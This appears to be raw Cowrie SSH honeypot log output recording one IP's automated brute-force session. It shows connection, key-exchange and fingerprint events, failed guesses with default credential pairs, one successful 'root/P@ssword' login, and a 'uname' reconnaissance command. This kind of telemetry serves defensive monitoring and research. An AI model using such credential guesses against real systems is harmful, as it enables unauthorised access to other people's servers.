{"eventid":"cowrie.login.success","username":"root","password":"P@ssword","message":"login attempt [root/P@ssword] succeeded","sensor":"my-vps","timestamp":"2025-08-26T10:20:44.564901Z","src_ip":"14.103.129.89","session":"432a848a47e4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T10:20:44.945322Z","src_ip":"14.103.129.89","session":"432a848a47e4"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-26T10:20:44.946030Z","src_ip":"14.103.129.89","session":"432a848a47e4"}
{"eventid":"cowrie.login.failed","username":"esuser","password":"123456","message":"login attempt [esuser/123456] failed","sensor":"my-vps","timestamp":"2025-08-26T10:20:44.947776Z","src_ip":"14.103.129.89","session":"9e34fd0b9e17"}
{"eventid":"cowrie.session.closed","duration":"11.6","message":"Connection lost after 11.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:20:46.137026Z","src_ip":"14.103.129.89","session":"9e34fd0b9e17"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"1.8","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 1.8 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:20:46.716873Z","src_ip":"14.103.129.89","session":"432a848a47e4"}
{"eventid":"cowrie.session.closed","duration":"6.8","message":"Connection lost after 6.8 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:20:46.718102Z","src_ip":"14.103.129.89","session":"432a848a47e4"}
{"eventid":"cowrie.session.connect","src_ip":"14.103.129.89","src_port":50750,"dst_ip":"1.2.3.4","dst_port":22,"session":"6e48f3442cf4","protocol":"ssh","message":"New connection: 14.103.129.89:50750 (1.2.3.4:22) [session: 6e48f3442cf4]","sensor":"my-vps","timestamp":"2025-08-26T10:20:49.256374Z"}
{"eventid":"cowrie.session.connect","src_ip":"14.103.129.89","src_port":43006,"dst_ip":"1.2.3.4","dst_port":22,"session":"44e04ef432b3","protocol":"ssh","message":"New connection: 14.103.129.89:43006 (1.2.3.4:22) [session: 44e04ef432b3]","sensor":"my-vps","timestamp":"2025-08-26T10:20:50.680088Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T10:20:50.681039Z","src_ip":"14.103.129.89","session":"44e04ef432b3"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T10:20:51.437486Z","src_ip":"14.103.129.89","session":"44e04ef432b3"}
{"eventid":"cowrie.login.failed","username":"ubuntu","password":"ubuntu","message":"login attempt [ubuntu/ubuntu] failed","sensor":"my-vps","timestamp":"2025-08-26T10:20:52.417811Z","src_ip":"14.103.129.89","session":"44e04ef432b3"}
{"eventid":"cowrie.session.connect","src_ip":"14.103.129.89","src_port":33666,"dst_ip":"1.2.3.4","dst_port":22,"session":"0b750d829a71","protocol":"ssh","message":"New connection: 14.103.129.89:33666 (1.2.3.4:22) [session: 0b750d829a71]","sensor":"my-vps","timestamp":"2025-08-26T10:20:52.981735Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T10:20:52.982782Z","src_ip":"14.103.129.89","session":"0b750d829a71"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T10:20:53.170413Z","src_ip":"14.103.129.89","session":"0b750d829a71"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T10:20:53.587456Z","src_ip":"14.103.129.89","session":"20b528f63d60"}
{"eventid":"cowrie.session.connect","src_ip":"14.103.129.89","src_port":33930,"dst_ip":"1.2.3.4","dst_port":22,"session":"8e3c679c3472","protocol":"ssh","message":"New connection: 14.103.129.89:33930 (1.2.3.4:22) [session: 8e3c679c3472]","sensor":"my-vps","timestamp":"2025-08-26T10:20:53.617145Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T10:20:53.617847Z","src_ip":"14.103.129.89","session":"8e3c679c3472"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T10:20:53.813939Z","src_ip":"14.103.129.89","session":"8e3c679c3472"}
{"eventid":"cowrie.session.connect","src_ip":"14.103.129.89","src_port":41338,"dst_ip":"1.2.3.4","dst_port":22,"session":"46961043a139","protocol":"ssh","message":"New connection: 14.103.129.89:41338 (1.2.3.4:22) [session: 46961043a139]","sensor":"my-vps","timestamp":"2025-08-26T10:20:56.751417Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T10:20:56.752311Z","src_ip":"14.103.129.89","session":"46961043a139"}
{"eventid":"cowrie.session.connect","src_ip":"14.103.129.89","src_port":32900,"dst_ip":"1.2.3.4","dst_port":22,"session":"441afdb892d5","protocol":"ssh","message":"New connection: 14.103.129.89:32900 (1.2.3.4:22) [session: 441afdb892d5]","sensor":"my-vps","timestamp":"2025-08-26T10:20:56.969499Z"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T10:21:02.355085Z","src_ip":"14.103.129.89","session":"f153adf78238"}
{"eventid":"cowrie.login.failed","username":"nginx","password":"nginx123","message":"login attempt [nginx/nginx123] failed","sensor":"my-vps","timestamp":"2025-08-26T10:21:03.849765Z","src_ip":"14.103.129.89","session":"f153adf78238"}
{"eventid":"cowrie.session.connect","src_ip":"14.103.129.89","src_port":37162,"dst_ip":"1.2.3.4","dst_port":22,"session":"22fe391cd243","protocol":"ssh","message":"New connection: 14.103.129.89:37162 (1.2.3.4:22) [session: 22fe391cd243]","sensor":"my-vps","timestamp":"2025-08-26T10:21:04.719011Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T10:21:04.720805Z","src_ip":"14.103.129.89","session":"22fe391cd243"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T10:21:04.918590Z","src_ip":"14.103.129.89","session":"22fe391cd243"}
{"eventid":"cowrie.session.closed","duration":"20.8","message":"Connection lost after 20.8 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:21:05.037470Z","src_ip":"14.103.129.89","session":"f153adf78238"}
{"eventid":"cowrie.session.connect","src_ip":"14.103.129.89","src_port":47964,"dst_ip":"1.2.3.4","dst_port":22,"session":"5f4eedf2eeeb","protocol":"ssh","message":"New connection: 14.103.129.89:47964 (1.2.3.4:22) [session: 5f4eedf2eeeb]","sensor":"my-vps","timestamp":"2025-08-26T10:21:06.140499Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T10:21:06.141556Z","src_ip":"14.103.129.89","session":"5f4eedf2eeeb"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T10:21:06.899016Z","src_ip":"14.103.129.89","session":"6e48f3442cf4"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T10:21:06.899686Z","src_ip":"14.103.129.89","session":"6e48f3442cf4"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T10:21:06.972906Z","src_ip":"14.103.129.89","session":"5f4eedf2eeeb"}
{"eventid":"cowrie.session.connect","src_ip":"14.103.129.89","src_port":57063,"dst_ip":"1.2.3.4","dst_port":22,"session":"f664b6a84c6f","protocol":"ssh","message":"New connection: 14.103.129.89:57063 (1.2.3.4:22) [session: f664b6a84c6f]","sensor":"my-vps","timestamp":"2025-08-26T10:21:07.797569Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T10:21:07.798330Z","src_ip":"14.103.129.89","session":"f664b6a84c6f"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T10:21:07.985265Z","src_ip":"14.103.129.89","session":"f664b6a84c6f"}
{"eventid":"cowrie.session.connect","src_ip":"14.103.129.89","src_port":33668,"dst_ip":"1.2.3.4","dst_port":22,"session":"2390942c05bd","protocol":"ssh","message":"New connection: 14.103.129.89:33668 (1.2.3.4:22) [session: 2390942c05bd]","sensor":"my-vps","timestamp":"2025-08-26T10:21:08.790236Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T10:21:08.791010Z","src_ip":"14.103.129.89","session":"2390942c05bd"}
{"eventid":"cowrie.login.failed","username":"hive","password":"hive","message":"login attempt [hive/hive] failed","sensor":"my-vps","timestamp":"2025-08-26T10:21:08.796895Z","src_ip":"14.103.129.89","session":"286ae9d1b7a5"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T10:21:08.995611Z","src_ip":"14.103.129.89","session":"2390942c05bd"}
{"eventid":"cowrie.session.connect","src_ip":"14.103.129.89","src_port":47834,"dst_ip":"1.2.3.4","dst_port":22,"session":"2b50fa8106b6","protocol":"ssh","message":"New connection: 14.103.129.89:47834 (1.2.3.4:22) [session: 2b50fa8106b6]","sensor":"my-vps","timestamp":"2025-08-26T10:21:09.622313Z"}
{"eventid":"cowrie.session.connect","src_ip":"14.103.129.89","src_port":40746,"dst_ip":"1.2.3.4","dst_port":22,"session":"3a2a54f7e1b8","protocol":"ssh","message":"New connection: 14.103.129.89:40746 (1.2.3.4:22) [session: 3a2a54f7e1b8]","sensor":"my-vps","timestamp":"2025-08-26T10:21:09.715389Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T10:21:09.762822Z","src_ip":"14.103.129.89","session":"3a2a54f7e1b8"}
{"eventid":"cowrie.session.closed","duration":"43.3","message":"Connection lost after 43.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:21:09.992056Z","src_ip":"14.103.129.89","session":"286ae9d1b7a5"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T10:21:10.406334Z","src_ip":"14.103.129.89","session":"2b50fa8106b6"}
